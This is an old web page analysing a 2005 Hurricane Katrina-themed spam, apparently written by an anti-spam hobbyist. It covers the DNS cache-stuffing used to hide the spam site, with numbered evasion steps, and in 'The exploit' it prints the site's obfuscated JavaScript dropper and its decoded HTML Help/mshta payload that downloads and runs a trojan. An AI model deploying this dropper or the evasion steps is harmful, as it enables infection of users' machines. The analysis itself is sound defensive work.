home | legal stuff | glossary | blog | search

 Legend:  new window    outside link    tools page  glossary link   

Spam analysis: example #9
DNS cache-stuffing; encrypted WinXP “Trojan Dropper”

There’s nothing particularly novel about this message on its face; things get VERY interesting, however, once you start to track down the cracker’s website(s). This seems to have been a very well-deployed effort (using elaborate DNS trickery) to use a little “human engineering” to implant suspicious files on vulnerable, unpatched versions of Microsoft Windows. First things first, however:

From address hidden Thu Sep 1 19:27:25 2005
Received: from elyo.fr ([172.18.12.133])
   by vms045.mailsrvcs.net
   (Sun Java System Messaging Server 6.2-2.05
   (built Apr 28 2005))
   with ESMTP id <0IM500H0K6LK0U80@vms045.mailsrvcs.net>
   for address hidden ;
   Thu, 01 Sep 2005 09:22:33 -0500 (CDT)
Received: from elyo.fr (201.27.212.22)
   by sv13pub.verizon.net
   (MailPass SMTP server v1.2.0 - 080905135255JY+PrW)
   with SMTP id <2-21369-167-21369-45779-1-1125584550> for
   vms045pub.verizon.net; Thu, 01 Sep 2005 09:22:32 -0500
Received: from [192.168.48.76] (helo=mangrove)
   by elyo.fr with smtp (Descant kp 5.32 (Selfless))
   id ozKkED-MYhgNO-MR for address hidden ; Thu,
   01 Sep 2005 09:22:09 -0500
Date: Thu, 01 Sep 2005 09:22:05 -0500
From: "Dayton Hiltz" address hidden
Subject: Re: j3 Tropical storm flooded New Orleans,
X-Originating-IP: [201.27.212.22]
To: "Philippa Hairston" address hidden
Reply-to: "Dayton Hiltz" address hidden
Message-id: <005e01c5af00$87046480$4c30a8c0@mangrove>
MIME-version: 1.0
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
Content-type: multipart/alternative;
boundary="----=_NextPart_000_005B_01C5AED6.9E2E5C80"
X-Priority: 3
X-MSMail-priority: Normal



This is a multi-part message in MIME format.

------=_NextPart_000_005B_01C5AED6.9E2E5C80
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

Theres the whole explanation for you! Berlioz thought in pump, which they =
stamped on the carpet with a preoccupied air. to fetch water in the gully =
below the hill, where in the thin shade of appeared. Catch him immediately, =
otherwise hell do untold harm! The professor does not know what draws him to =
the fence or who lives in No, excuse me! The exposure is absolutely =
necessary. Without it your of the truck and raised his arm, for some reason =
attacking the cast-iron man The artiste clasped his hands. all. The moment =
Ace of Diamonds ran into the findirectors office, he one of the =
investigators. The barman became as if welded to his tabouret. I, I, =
whispered the cat, I give the signal! Right. Of course. Absolutely. Urgently. =
Without fail. Ill tell Therefore she started doing whatever came along. She =
smashed pots of whispered. He just doesnt want to! He doesnt like hotels! Ive =
had them at his desk, facing the summer garden of the Variety, where there =
were

------=_NextPart_000_005B_01C5AED6.9E2E5C80
Content-Type: text/html;
charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; charset=3Dus-ascii">
<META content=3D"MSHTML 6.00.2800.1106" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial>&nbsp;Just before daybreak Tuesday, Katrina, now a =
tropical storm, was 35 miles<BR>northeast of Tupelo, Miss., moving =
north-northeast with winds of 50 mph. <BR>Forecasters at the National =
Hurricane Center said the amount of rainfall <BR>has been adjusted downward =
Monday. </FONT></DIV>
<DIV><FONT face=3DArial></FONT>&nbsp;</DIV>
<DIV><FONT face=3DArial>&nbsp;Mississippi Gov. Haley Barbour said Tuesday =
that Hurricane Katrina killed <BR>as many as 80 people in his state and burst =
levees in Louisiana flooded New <BR>Orleans.</FONT></DIV>
<DIV><FONT face=3DArial></FONT>&nbsp;</DIV>
<DIV><FONT face=3DArial><A href=3D"http://nextermest.com">Read =
More..<BR></A></DIV></FONT></BODY></HTML>

------=_NextPart_000_005B_01C5AED6.9E2E5C80--


Just to get the boring stuff out of the way: the message was dropped off by 201.27.212.22, a Brazilian host; it was misidentified as elyo.fr (yet another case of a domain name being used as a false HELO). This handoff is shown in the second Received line, by the way; the first line looks to be an internal relay within Verizon (my ISP). The body has two MIME parts: a text/plain part (that few recipients will see in their mail programs) containing a lot of neutral text to help the message through Bayesian filters, and a text/html part that contains the actual payload. Not terribly remarkable as spams go these days.

The payload message refers to the tragedy of Hurricane Katrina, which was fresh on everyone’s minds at the time, and so the message was well calibrated to get a lot of people to follow the offered website link to nextermest.com (pink highlight).

What comes next involves not so much the spam, but the website to which it points. I freely admit to not being a particular expert in DNS, Windows Trojans, or related matters, and a lot of what I will say here is pretty speculative. Perhaps, however, someone may be able to pick up the ball and run with it.

Stuffing the cache

So, what is nextermest.com? That’s a good question that I’ll tackle later on, but first we might want to ask, “Where is (or was) nextermest.com?” As I began to research this site for a spam report, my whois lookup tracked it to a Canadian IP address. However, SpamCop had other ideas and tracked it to a completely different IP. This seemed odd, so I availed myself of the “ISP cached DNS lookup tool” provided by http://www.DNSstuff.com/ and found something fairly surprising: depending upon whose name server you used, nextermest.com could have been found at any of the following six IP addresses:

Address Provider
24.164.104.124 Roadrunner (rr.com) (USA)
ROAD-RUNNER-5 net block
201.150.68.7 Cablemas Juarez (Mexico)
MX-CAJU-LACNIC
24.131.98.37 Comcast (comcast.net) (USA)
PENNSYLVANIA-5 net block
61.52.228.192 CNC Group Henan province network (China)
CNCGROU-HA net block
216.55.194.126 MyManitoba.com (mts.net) (Canada)
BRND-RES-DSL-1-MB-CA net block

What’s this? How can one host name resolve to any of six (or more) different IP addresses at the same time? It’s easy if you know the trick — a trick that I call “stuffing the cache.”

The domain name service (DNS) is the service that gives you a numeric IP address when you give it a host name. Every time you load a website or send out an e-mail (or perform just about any other internet-related task), your computer is making one or more requests, or “queries” to find out the IP address associated with the name (this is called “resolving the name” in DNS parlance).

Normally, your computer talks to a DNS host or “name server” in your own domain; this name server then goes out to a hierarchy of other (external) name servers, eventually finding the one that knows where the host name you want can be found on the IP network (this name server is called the “authoritative” name server for the domain in question).

Consider now what happens with a large ISP that has thousands of customers; at any given time, large numbers of them will probably be looking things up on Google. This would normally result in a huge number of repetitive lookups for www.google.com; this is inefficient and wasteful of bandwidth.

For this reason, most name servers will “cache” (temporarily store) popular name lookups so that they don’t have to traverse the DNS hierarchy for each and every lookup. For example, when you ask for “www.google.com,” your provider’s name server will simply give you its cached answer instead of running another top-down DNS query to external DNS hosts. This is good, because it gives you faster response, and also keeps the provider from clogging its backbone bandwidth with a zillion redundant full top-down lookups for Google.

Because host names and IP numbers are constantly changing, however, we can’t hang onto cache entries forever; these are therefore stamped with a “time-to-live” (TTL), after which they expire and must be “refreshed” with a full lookup. Usually, the TTL is on the order of a few hours or a couple of days. This is one of the reasons why DNS changes can sometimes take a few hours or days to fully propagate around the world.

Just what is the point of all this discussion? The point is that name server caching can provide spammers with an excellent means to hide their websites “in plain sight” as it were. Suppose you have set up a spam website, and you want to deflect spam investigators from finding out where it is hosted. This is what you do:

  1. Buy a domain name for the site (e.g., “phony.foo”).
  2. Set up your own DNS servers to be the “authoritative” name servers for “phony.foo” (or, contract with crooked DNS-only providers who specialize in spam support).
  3. Log on to an assortment of your favorite large ISPs (AOL, Verizon, Comcast, etc.) and make repeated DNS requests for “phony.foo.” Eventually, you will get your site cached by these providers’ name servers.
  4. Now, disable your authoritative name servers so that it is no longer possible to do a top-down name lookup for “phony.foo.”

Congratulations; you’ve ensured full access to your site (at least for as long as the TTL of your cache entries), while at the same time you’ve confused or stymied inexperienced spam investigators. This is the typical sort of cache-stuffing that one occasionally finds in normal spam these days.

The folks behind nextermest.com took the basic cache-stuffing concept several steps further: they set up six (or at least six) different websites; then, they selectively stuffed the caches of various providers with one or another of these. In this way, a user looking up nextermest.com would get different answers depending upon whose name server he used.

But how (the educated reader may ask) could one authoritative name server give six completely different answers to where nextermest.com is? Let’s turn to the useful tool dig to find out exactly what the authoritative name servers were for nextermest.com.

[G4733:~] rconner% dig nextermest.com

; <<>> DiG 9.2.2 <<>> nextermest.com
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 8901
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2

;; QUESTION SECTION:
;nextermest.com. IN A

;; ANSWER SECTION:
nextermest.com. 3782 IN A 24.164.104.124

;; AUTHORITY SECTION:
nextermest.com. 3207 IN NS ns1.nextermest.com.
nextermest.com. 3207 IN NS ns2.nextermest.com.

;; ADDITIONAL SECTION:
ns1.nextermest.com. 3207 IN A 24.164.104.124
ns2.nextermest.com. 3207 IN A 24.164.104.124

;; Query time: 133 msec
;; SERVER: 199.45.32.38#53(199.45.32.38)
;; WHEN: Thu Sep 1 19:52:01 2005
;; MSG SIZE rcvd: 116

Here, dig has told us the IP address that it has for nextermest.com (yellow highlight), and also the host names (green highlight) and IP addresses (pink highlight) of the two name servers that are listed as “authoritative” for the domain. But—wait a minute—the two name servers ns1.nextermest.com and ns2.nextermest.com are not only both at the same address, they’re at the same address as the website nextermest.com itself! (The mts.net address in this particular case).

You begin to get a clue to what’s going on when you look at the addresses given above: at least three of the six are clearly DSL (or cable modem) subscriber lines — probably used by the machines of home users. So, it looks as though we have some particularly intelligent open proxies or “zombies” at work here — not only do they have their own web servers, they also have their own vestigial DNS hosts as well. I’m not enough of a DNS expert to know how the perps could get six different addresses into circulation for their bogus name servers (perhaps cache-stuffing works here too), but clearly there’s some gross abuse of DNS going on here.

As we entered the Labor Day weekend, nextermest.com’s presence on the network went down dramatically. First, the websites disappeared (nextermest.com at port 80), followed by the name servers (nextermest.com at port 53), until by Monday it was still possible to resolve the name servers to 222.135.42.216 (yet another Chinese CNC-Group address), but they no longer responded to pings.

It would be nice to think that these sites were shut down through the fast response of the abuse staffs and NOCs at the affected providers; however, it is more likely that the sites were scheduled to shut down automatically, or may have been shut down remotely by the perpetrators after they had accomplished their objectives, and before investigators could get onto their trail.

The domain

Can we learn anything by looking up the domain registry info for nextermest.com? I dunno, let’s try:

[G4733:~] rconner% whois -h whois.joker.com nextermest.com
domain: nextermest.com
owner: david ahn
email: dcorbins@yahoo.com
address: 350 s. grand ave. suite 200
city: Los Angeles
state: ca
postal-code: 90071
country: US
phone: +1 9284411897
admin-c: dcorbins@yahoo.com#5
tech-c: dcorbins@yahoo.com#5
billing-c: domainz@web2mail.com#0
reseller: Registered through Your-Domains-Here.com
reseller: Your first offshore domain registar
reseller: Belize,Belize City,99 Albert Street
reseller: Forward abuses to abuse@your-domains-here.com
nserver: ns1.nextermest.com 222.135.42.216
nserver: ns2.nextermest.com 222.135.42.216
status: lock
created: 2005-08-24 17:17:42 UTC
modified: 2005-08-28 12:47:39 UTC
expires: 2006-08-24 13:17:41 UTC
source: joker.com live whois service
query-time: 0.069384
db-updated: 2005-09-03 01:08:20

Note that I went straight to whois.joker.com for this lookup, because an earlier “default” whois lookup (“whois nextermest.com”) told me that the info would be found there.

The domain was registered on August 24th (very soon before the mails went out) with an outfit known as “Your-Domains-Here.com” based in Belize. One suspects that the slogan “Your first offshore domain registrar” may be a codeword of some sort; this outfit was prominently featured as the seller of numerous spam domains at the time the nextermest.com message appeared.

It’s hard for me to make much out of the rest of the registration data. The name “David Ahn” did not turn up much in a Google search. I have no particular way to check up on the Yahoo mail address, other than by sending mail to it (which I’m not particularly interested in doing). The street address could be mapped by Yahoo Maps and had the correct zip code. A reverse lookup on the phone number provided no listing, but did indicate that the area code and exchange are from Prescott, Arizona rather than Los Angeles (if this happened to be a cell phone number, then it would not be uncommon for it to have been “transferred” to LA from Arizona by its owner). The same phone number appeared in the registration data for at least one other more conventional spam domain, which suggests that a spam gang is at work here.

The exploit

So, why go to what was obviously a hell of a lot of trouble (much more than the typical spammer would tolerate) to get these six sites up and running just for the duration of the TTL window? For the answer to that, I went (with trepidation) to the nextermest.com site.

The website looked harmless enough, just a string of random “news stories” (leading off with the Katrina story), plus an “advertisement” for anti-virus software. However, this is the HTML source of what you saw on the screen:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head><title>Katrina killed as many as 80 people.
</title></head>
<body style="font-family: Tahoma; font-size: 14px;">
<script>
var hr=location.href,st='',k='',s='',b='cgabbfbbgbcbbaibabcgccdf
bcacfaceecdfbcacfbbcdbbcbbbbbfbafbbgbafbbbbbacficjhcjibbfbbbbaib
bhbbgbabcfjbaibabbacbbgcficefcejceiceiceicfjbcfcgacehbbfbbgbcbba

(NUMEROUS LINES OF SIMILAR GIBBERISH SNIPPED)

fjcdjceecejceiceiceicebcfjbbfbabbbgciebafbajbabbbbbbhbbgceacdjbb
jbafbbabaabbbbbjcegcjjbaibbbbbfbabceacebcfjcdjceecejcfaceiceiceb
cfjcgacehbbfcjjbbebafbbcbbgcgc';
for(i=0;i<b.length;i++){
s+=b.slice(i,i+1).charCodeAt(0)-97;};
for(j=0;j<String(s).length;j+=3){
k=parseInt(String(s).slice(j,j+3));
if(k>200){k-=200;}
st+=String.fromCharCode(k);};
document.write(st.replace('%',hr.substring(0,hr.lastIndexOf('/')) +'/w.hta'));
</script>
<table align=center cellpadding="5">
<tr><td>
<table align=center width="650" style="border: solid #cccccc 1pt;" cellpadding="15"><tr><td>
<div style="font-size:28px;" align=center>Katrina killed as many as 80 people.
</div><br>
<table align="right" border="0" cellpadding="0" cellspacing="0" width="203">
<tbody><tr><td>
<div>
<img alt="" src="img/nvvzbui4.jpg
" border="1" hspace="0" vspace="0" width="203">
</div>
</td></tr>
</tbody></table><b>NEW ORLEANS, United States (UPI) -- Mississippi Gov. Haley Barbour said Tuesday that Hurricane Katrina killed as many as 80 people in his state and burst levees in Louisiana flooded New Orleans.
</b><p>Just before daybreak Tuesday, Katrina, now a tropical storm, was 35 miles northeast of Tupelo, Miss., moving north-northeast with winds of 50 mph. Forecasters at the National Hurricane Center said the amount of rainfall has been adjusted downward Monday.
</p><p>Thirty storm-related deaths in Mississippi`s Harrison County were at an apartment complex, near the beach in Biloxi, Kelly Jakubic with the county`s Emergency Operations Center told CNN.
</p><p>Louisiana Gov. Kathleen Babineaux Blanco said there was no official death tally in Louisiana, but said she expected that to change.

(REMAINDER SNIPPED)

This is a straightforward HTML page, but it has a very odd-looking encrypted JavaScript at the top. Looks like another job for our old code-breaking hack, the OmniWeb alert box trick; I changed the document.write statement (pink highlight) to an alert statement, and then reloaded the page. This is how the script got decoded (I changed the line breaks for readability):

<style>#x2,#x3{position:absolute;left:-1000;}</style>
<OBJECT id=x2 classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11>
<PARAM NAME="Command" VALUE="Related Topics">
<PARAM NAME="Button" VALUE="Text:">
<PARAM NAME="Window" VALUE="$global_blank">
<param name="Scrollbars" value="true">
<PARAM NAME="Item1" VALUE="command;ms-its:icwdial.chm::/icw_overview.htm">
</OBJECT>
<script>
x2.HHClick();
window.opener.focus();
</script>
<OBJECT id=x3 classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11>
<PARAM NAME="Command" VALUE="Related Topics">
<PARAM NAME="Button" VALUE="Text:">
<PARAM NAME="Window" VALUE="$global_blank">
<PARAM NAME="Item1" VALUE=
   "command;javascript:document.links[0].href
      ='EXEC=,mshta,file:/Users/rconner/Desktop/w.hta      CHM=ieshared.chm      FILE=app_install.htm'3document.links[0].click();">
</OBJECT>
<script>
setTimeout('x3.HHClick();',1000);
setTimeout('window.close();',1200);
</script>

I direct your attention in particular to the yellow highlight: I don’t speak Microsoft-ese, but this bit seems to be an attempt to load a page called “app_install.html,” and then get a file called “w.hta” onto my system and execute it (the attempt did not work, probably because I’m a Mac user). I googled the term “hta file” and found the following chilling information (emphasis added):

So, there you are. Thank you so bloody much, Microsoft, for another confusing, redundant, and irrelevant “enhancement” to your porous and substandard operating systems, a “feature” that can be turned into a criminal weapon. Thanks to HTA, crackers can completely fsck up innocent users’ machines at will “...without annoying alerts and warnings.”

In the days that followed, security reports and blogs began to show up on Google describing the nature of the nextermest.com attack. Apparently, it now has a name: Trojan-downloader.JS.Small.bq. It’s basic mission, as the name implies, is to use JavaScript to download a “trojan horse” file to vulnerable computers; it is hard to say exactly what the perps intended without a live example of the actual file downloaded, but I’d say the chances were very good that the perps were “recruiting” a fresh supply of open proxy machines for sending spam mail. The amount of expense and trouble associated with this gag is simply too much for simple “script kiddy” sociopathy.

A bit more research suggested that this exploit was derived from one posted on the web in late 2004 as a “proof of concept” for a Windows remote command execution exploit. The publishers of that POC appear to have meant well in the effort to draw attention to a major security hole (affecting some versions of Windows XP and Windows Server 2003), but in so doing they may have made it a bit too easy for bad guys to copy and paste the nasty stuff into their own exploits.

Here’s another link, this one from spywareinfo.com, describing HTA exploits in further detail. Consider yourself warned.

Next example :: Previous example :: Back to sample analyses



 home | legal stuff | glossary | blog | search

 Legend:  new window    outside link    tools page  glossary link   

(c) 2003-2006, Richard C. Conner ( )

05773 hits since March 28 2009

Updated: Sat, 06 May 2006